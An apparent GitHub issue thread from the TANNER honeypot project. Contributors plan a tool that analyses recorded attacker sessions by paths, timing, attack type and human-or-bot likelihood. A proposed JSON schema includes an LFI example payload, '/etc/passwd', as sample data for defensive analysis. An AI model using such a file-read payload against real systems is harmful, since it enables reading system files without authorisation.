Comments (9)
You probably want to have a dict with all the request paths for a session and then count how often a certain path was accessed. Maybe also a timestamp for when which path was accessed. I kind of want to see which paths the attacker tried to access when and in which order.
from tanner.
This is a rather open task so don't get hung up on it.
from tanner.
Moved this issue to gsoc_sprint_3
from tanner.
I think a good start for this task is to look at RFI attacks. They usually start with an injection of a id script. They run some simple script that should return some information about the system. If successful, they inject the bot. In the sessions, we should be able to see the stages. Maybe we should start this with a tool to investigate the stored sessions.
from tanner.
1.Maybe we should store the attack type in the session? For now we store paths, and we need to analyze them, i.e. we should do the same thing that we do in detection.
2.When we should initialize investigation tool? When the session is added/updated, or after session is pushed to redis? If we use redis, maybe we need update old session in the redis?
For now I don't fully understand how to investigate stored session. Count how often was accessed the certain path and it's type? Use paths timestamps to measure periods of attacks? (I think humans more slowly than network tools and crawlers). If we use hidden links, we can't with 100% say it's human or bot (because of the fact, that attacker can use page source to access hidden links), but we can maybe store that someone have accessed hidden link and use it for investigation
from tanner.
Both are good ideas, we definitely want the attack type stored in the session. You can start with adding requests/second to the session when you close it.
from tanner.
What we expect as a result? Maybe we make json for every session with stats, e.g.
"uuid":"session uuid",
"user_agent":"ua",
"sensor_uuid":"suuid",
"start time":"start timestamp",
"end_time":"end timestamp",
"requests/second":"10",
"approx_time_between_requests":0.1,
"accepted_paths":20,
"errors":"no",
"paths":[
{
"path":"path1",
"attack_type":"lfi",
"payload":"/etc/passwd",
"time":"timestamp"
}
],
"possible_owner":"human"
from tanner.
I think about storing evaluation result. Maybe we don't need raw sessions in redis, maybe we should store only sessions, that were evaluated?
from tanner.
You are right, we can keep the open sessions in the TANER Python process memory. Create a separate issue for it.
Closing this issue after merging 7087bb8
from tanner.
Related Issues (20)
- Improve regex pattern for attack detection
- Permissions error HOT 1
- tannerweb issue HOT 4
- Tanner API Parameter for setting number of returned session HOT 4
- JSON Logging hierarchy issue HOT 2
- User, tool, crawler and attacker HOT 1
- JSON parse error HOT 2
- AttributeError: module 'aioredis' has no attribute 'create_redis_pool' HOT 12
- Feature Request: Log4Shell exploit detection
- TannerWeb Redis issue HOT 2
- RFI emulator exception: Future <Future pending> attached to a different loop
- TypeError: zrevrangebyscore() got an unexpected keyword argument 'offset' HOT 2
- GSoC 2022 FAQ [WIP]
- GSoC'22 - HTTP requests evaluation HOT 1
- GSoC'22 - Web Improvement
- Tanner installation HOT 1
- Python 3.10 breaks Tanner HOT 1
- Docker Installation of Tanner fails due to some dependencies HOT 1
- TypeError: zrevrangebyscore() got an unexpected keyword argument 'offset' when running through docker HOT 2
- Session analyzer is not working
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from tanner.